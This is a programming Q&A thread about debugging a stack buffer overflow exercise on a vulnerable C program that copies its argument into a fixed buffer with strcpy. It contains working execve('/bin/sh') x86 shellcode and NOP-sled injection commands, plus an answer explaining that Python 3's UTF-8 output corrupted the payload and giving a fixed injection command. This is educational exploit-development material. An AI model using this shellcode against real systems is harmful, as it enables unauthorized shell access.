# Not getting the expected output when running a shell code in a buffer overflow

Tags: x86, gdb, buffer-overflow, machine-code, shellcode

After finding the `eip` offset i'm trying to input some shell code to my program. With the following command `run $(python -c 'print("A"*108 + "BBBB")')` i get the following output

```
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
```

Now the problem occurs when i try to add my shell code. When i input

```
run $(python -c 'print("\x90"*63 + "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "B" * 20)')
```

i don't get what i was exepected, the return address being overwritten with B's, but i get the following

```
Program received signal SIGSEGV, Segmentation fault.
0x90c290c2 in ?? ()
```

It does work, when i increase the number of B's to 48 and decrease the number of NOPs to 35, but i'm not quite understanding why this doesn't work with more NOPs and less B's for the return address. One other thing i do not understand is that i'm not seeing any NOPs in my stack.

```
(gdb) x/200x $esp
0xffffd2a0: 0x42424242  0x42424242  0x42424242  0x42424242
0xffffd2b0: 0x42424242  0x42424242  0x42424242  0x42424242
0xffffd2c0: 0x42424242  0x42424242  0x00424242  0x00000001
0xffffd2d0: 0xffffd398  0x68e47ce5  0x9e780f0a  0x00000000
0xffffd2e0: 0x00000000  0x00000000  0xffffd3e0  0x0804b519
0xffffd2f0: 0x00000000  0x08049c76  0xffffd3e0  0x0804b52d
0xffffd300: 0x00000000  0x00000000  0x00000000  0x0804968d
0xffffd310: 0x00000040  0x0000000c  0x00000040  0x00000008
0xffffd320: 0x00040000  0x00000040  0x00002000  0x00300000
0xffffd330: 0x00090000  0x00040000  0x00002000  0x00008000
0xffffd340: 0xffffd370  0xffffd3d4  0x00000002  0x00000001
0xffffd350: 0x00000006  0x00000045  0x00000001  0x00300000
0xffffd360: 0x000c0000  0x00000004  0x00000001  0x00000000
0xffffd370: 0xffffffff  0x00000000  0x080e3620  0x00000000
0xffffd380: 0x00000000  0x00000000  0xffffd3b0  0x080e3ff4
0xffffd390: 0x00000002  0x00000000  0x00000000  0x08049688
0xffffd3a0: 0x00000000  0x00000000  0x00000000  0x08049688
0xffffd3b0: 0x0804968d  0x00000002  0xffffd3d4  0x00000000
0xffffd3c0: 0x00000000  0x00000000  0xffffd3cc  0x00000000
0xffffd3d0: 0x00000002  0xffffd5d2  0xffffd609  0x00000000
0xffffd3e0: 0xffffd6a5  0xffffd6b5  0xffffd6c9  0xffffd6ff
0xffffd3f0: 0xffffd70c  0xffffd746  0xffffd773  0xffffd78a
0xffffd400: 0xffffd79e  0xffffd7d1  0xffffd80f  0xffffd826
0xffffd410: 0xffffd83e  0xffffd881  0xffffd891  0xffffd89d
0xffffd420: 0xffffd8bd  0xffffd8cc  0xffffd8ff  0xffffd90a
0xffffd430: 0xffffd925  0xffffd93a  0xffffd94f  0xffffd95e
0xffffd440: 0xffffd97e  0xffffd9ac  0xffffd9bb  0xffffd9c4
0xffffd450: 0xffffda14  0xffffda22  0xffffda33  0xffffda48
0xffffd460: 0xffffda60  0xffffda6c  0xffffdaf0  0xffffdb01
0xffffd470: 0xffffdb35  0xffffdb64  0xffffdbb0  0xffffdbbf
0xffffd480: 0xffffdbd4  0xffffdbeb  0xffffdc09  0xffffdc1d
0xffffd490: 0xffffdc25  0xffffdc3b  0xffffdc6d  0xffffdc78
0xffffd4a0: 0xffffdc80  0xffffdc99  0xffffdcb4  0xffffdcbf
0xffffd4b0: 0xffffdcd0  0xffffdcef  0xffffdd21  0xffffdd35
0xffffd4c0: 0xffffdd53  0xffffdd6a  0xffffdd83  0xffffdda1
0xffffd4d0: 0xffffde16  0xffffde2c  0xffffde3c  0xffffdf08
0xffffd4e0: 0xffffdf1a  0xffffdf50  0xffffdf6c  0xffffdf84
0xffffd4f0: 0xffffdf9b  0x00000000  0x00000020  0xf7ffc570
0xffffd500: 0x00000021  0xf7ffc000  0x00000033  0x000006f0
0xffffd510: 0x00000010  0xbfebfbff  0x00000006  0x00001000
0xffffd520: 0x00000011  0x00000064  0x00000003  0x08048034
0xffffd530: 0x00000004  0x00000020  0x00000005  0x00000009
0xffffd540: 0x00000007  0x00000000  0x00000008  0x00000000
0xffffd550: 0x00000009  0x08049660  0x0000000b  0x000003e8
0xffffd560: 0x0000000c  0x000003e8  0x0000000d  0x000003e8
0xffffd570: 0x0000000e  0x000003e8  0x00000017  0x00000000
0xffffd580: 0x00000019  0xffffd5bb  0x0000001a  0x00000002
0xffffd590: 0x0000001f  0xffffdfc1  0x0000000f  0xffffd5cb
0xffffd5a0: 0x0000001b  0x0000001c  0x0000001c  0x00000020
0xffffd5b0: 0x00000000  0x00000000  0x62000000  0x9e72e32a
```

I'm using Python 3. The shell code is 25 bytes long. I have already disabled ASLR.
This is my code in C

```
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv){
    char buffer[100];
    strcpy(buffer, argv[1]);

    return 0;
}
```

Comment: `0x90c290c2` . I noticed that the NOP's (0x90) are paired with 0xC2. This indicates to me that python3 is outputting unicode (UTF-8). You need to output as 8-bit ASCII(ISO-8859-1 / Latin-1). If you used python2 you'd probably discover it outputs the string  as you'd expect.

Comment: The easiest fix is to use byte string literals and write them directly to standard out rather than use print. This should work `run $(python -c "import sys; sys.stdout.buffer.write(b'\x90'*63 + b'\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + b'B' * 20)")`

Comment: @MichaelPetch thanks, it worked. you can post an answer, and i will mark it as correct

Answer (score 2, accepted):

Python3's string literals `"..."` default to UTF-8 (Unicode) encoding when `print`ing, not 8-bit ASCII (ISO-8859-1/Latin-1). As a result extra characters are being output that renders your shellcode unusable.

If you were to run your Python command like:

```
python -c 'print("\x90"*63 + "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "B" * 20)' | hexdump -C
```

Piping the output through `hexdump` can make the issue more obvious. The output will look something like:

```
00000000  c2 90 c2 90 c2 90 c2 90  c2 90 c2 90 c2 90 c2 90  |................|
*
00000070  c2 90 c2 90 c2 90 c2 90  c2 90 c2 90 c2 90 c3 ab  |................|
00000080  0b 5b 31 c3 80 31 c3 89  31 c3 92 c2 b0 0b c3 8d  |.[1..1..1.......|
00000090  c2 80 c3 a8 c3 b0 c3 bf  c3 bf c3 bf 2f 62 69 6e  |............/bin|
000000a0  2f 73 68 42 42 42 42 42  42 42 42 42 42 42 42 42  |/shBBBBBBBBBBBBB|
000000b0  42 42 42 42 42 42 42 0a                           |BBBBBBB.|
000000b8
```

You'll notice that the value `C2` and `C3` have been inserted into the middle of your code for those characters that are >= 0x80. As a result the output is no longer suitable as shellcode.

If you switch to using Python2 the problem would resolve itself since it doesn't default to a Unicode character set. Something that works for Python2 and Python3 is the use of byte string literals `b'...'` and use `sys.stdout.buffer.write` to output the bytes to standard output.

A command like this should work in GDB:

```
run $(python -c "import sys; sys.stdout.buffer.write(b'\x90'*63 + b'\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + b'B' * 20)")
```